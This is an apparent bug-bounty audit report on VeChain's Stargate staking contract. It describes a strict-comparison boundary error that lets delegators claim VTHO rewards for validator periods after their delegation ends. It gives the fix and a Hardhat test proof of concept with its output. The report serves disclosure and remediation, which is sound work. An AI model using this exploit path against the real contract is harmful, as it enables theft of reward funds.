59665 sc high delegators can claim rewards beyond delegation end

Submitted on Nov 14th 2025 at 16:01:20 UTC by @danvinci_20 for Audit Comp | Vechain | Stargate Hayabusa

Report ID: #59665
Report Type: Smart Contract
Report severity: High
Target: https://github.com/immunefi-team/audit-comp-vechain-stargate-hayabusa/tree/main/packages/contracts/contracts/Stargate.sol
Impacts: Direct theft of any user funds, whether at-rest or in-motion, other than unclaimed yield

Description

Summary

The system incorrectly determines the claimable reward periods for a delegated NFT after the delegator has requested to exit.

This occurs because the ended-delegation branch uses a strict comparison:

endPeriod > nextClaimablePeriod

instead of the correct:

endPeriod >= nextClaimablePeriod

When endPeriod == nextClaimablePeriod, the code fails to recognize that the delegation has already ended and instead treats it as still active. As a result, once new validator periods are completed, the delegator can call claimRewards() to claim rewards for periods after their delegation has already ended, even though their stake is no longer contributing and the validator is no longer using their VET.

This allows delegators to drain rewards for periods they did not stake for, extracting unearned VTHO and destabilizing the reward pool.

Vulnerability Details

Relevant code paths:

Core logic is inside _claimableDelegationPeriods:

if (
    endPeriod != type(uint32).max &&
    endPeriod < currentValidatorPeriod &&
    endPeriod > nextClaimablePeriod
) {
    return (nextClaimablePeriod, endPeriod);
}

Because the condition uses a strict endPeriod > nextClaimablePeriod, the ended-delegation branch does not trigger when the staker has claimed up to exactly endPeriod - 1.

The system incorrectly assumes the delegation is still active and falls through to this logic:

if (nextClaimablePeriod < currentValidatorPeriod) {
    return (nextClaimablePeriod, completedPeriods);
}

This returns:

(firstClaimable = nextClaimablePeriod,
 lastClaimable = completedPeriods)

Meaning the delegator can now claim rewards for all periods between endPeriod and the current completed period, even though the validator is no longer using their stake.

Impact

Delegators can claim VTHO rewards for validator periods after their delegation has ended, receiving rewards they did not earn.

Recommendation

Fix the boundary condition in the ended-delegation branch to be inclusive:

endPeriod >= nextClaimablePeriod

This ensures when the delegator has claimed up to endPeriod - 1 (so nextClaimablePeriod == endPeriod), the ended-delegation branch will correctly cap claimable periods to the delegation end.

Proof of Concept

PoC: additional helper function and integration test demonstrating the issue

Add this function to Stargate.sol:

function getLastClamiedPeriod(uint256 tokenId) public view returns(uint256) {
    return _getStargateStorage().lastClaimedPeriod[tokenId];
}

Add the following test to test/integration/Delegation.test.ts and run:

yarn hardhat test --network vechain_solo test/integration/Delegation.test.ts

Test (excerpt):

it.only("any user can drain the rewards for periods, they didn't stake for", async () => {
    const paramsKey = "0x00000000000064656c656c656761746f722d636f6e74726163742d61646472657373";
    const stargateAddress = await protocolParamsContract.get(paramsKey);
    const expectedParamsVal = BigInt(await stargateContract.getAddress());
    expect(stargateAddress).to.equal(expectedParamsVal);

    const validatorAddress = await protocolStakerContract.firstActive();
    expect(compareAddresses(validatorAddress, deployer.address)).to.be.true;

    const [leaderGroupSize, queuedValidators] =
        await protocolStakerContract.getValidationsNum();
    expect(leaderGroupSize).to.equal(1);
    expect(queuedValidators).to.equal(0);

    // staking the token here 
    const levelId = 1;
    const levelSpec = await stargateNFTContract.getLevel(levelId);
    const levelVetAmountRequired = levelSpec.vetAmountRequiredToStake;

    // Stake an NFT of level 1
    const stakeTx = await stargateContract
        .connect(user)
        .stake(levelId, { value: levelVetAmountRequired });
    await stakeTx.wait();

    // Assert owner and maturity
    const tokenId = await stargateNFTContract.getCurrentTokenId();
    expect(await stargateNFTContract.ownerOf(tokenId)).to.equal(user.address);
    expect(await stargateNFTContract.isUnderMaturityPeriod(tokenId)).to.be.true;

    // Fast-forward until the NFT is mature
    await mineBlocks(Number(levelSpec.maturityBlocks));

    expect(await stargateNFTContract.isUnderMaturityPeriod(tokenId)).to.be.false;

    // Delegate the NFT
    const delegateTx = await stargateContract.connect(user).delegate(tokenId, deployer.address);
    await delegateTx.wait();

    const delegation = await stargateContract.getDelegationDetails(tokenId);
    let [start,] = await protocolStakerContract.getDelegationPeriodDetails(delegation.delegationId);

    let [period,startBlock,,completedPeriods] = await protocolStakerContract.getValidationPeriodDetails(deployer.address);

    await fastForwardValidatorPeriods(Number(period), Number(startBlock), 5);

    [,,,completedPeriods] = await protocolStakerContract.getValidationPeriodDetails(deployer.address);

    let delegatorRewards = await protocolStakerContract.getDelegatorsRewards(deployer.address, 2);

    // claim accumulated rewards
    const claimTx = await stargateContract.connect(user).claimRewards(tokenId);
    await claimTx.wait();

    let lastClaimedperiod = await stargateContract.getLastClamiedPeriod(tokenId);

    const exitTx = await stargateContract.connect(user).requestDelegationExit(tokenId);
    await exitTx.wait();

    let [,endPeriod] = await protocolStakerContract.getDelegationPeriodDetails(delegation.delegationId);

    await fastForwardValidatorPeriods(Number(period), Number(startBlock), 10);

    [,,,completedPeriods] = await protocolStakerContract.getValidationPeriodDetails(deployer.address);

    let [firstclaimableNow, lastClaimableNow] = await stargateContract.claimableDelegationPeriods(tokenId);
});

Observed output (relevant lines):

start period of delegation:  2n
completedPeriods After:  6n
lastClaimedperiod:  6n
endPeriod:  7n
completedPeriods After:  17n
claimable periods:  7n 17n
✔ any user can drain the rewards for periods, they didn't stake for (48618ms)

This demonstrates that after requesting exit (endPeriod == 7) and having last claimed period == 6, the contract reports claimable periods starting at 7 and extending to 17, allowing claims for periods after delegation end.

Previous59657 sc high delegators lose first reward period when delegating to pending validators Next59709 sc high post exit rewards overpayment theft of unclaimed yield due to misclamped claim window in stargate

Was this helpful?

hashtagDescription

hashtagSummary

hashtagVulnerability Details

hashtagImpact

hashtagRecommendation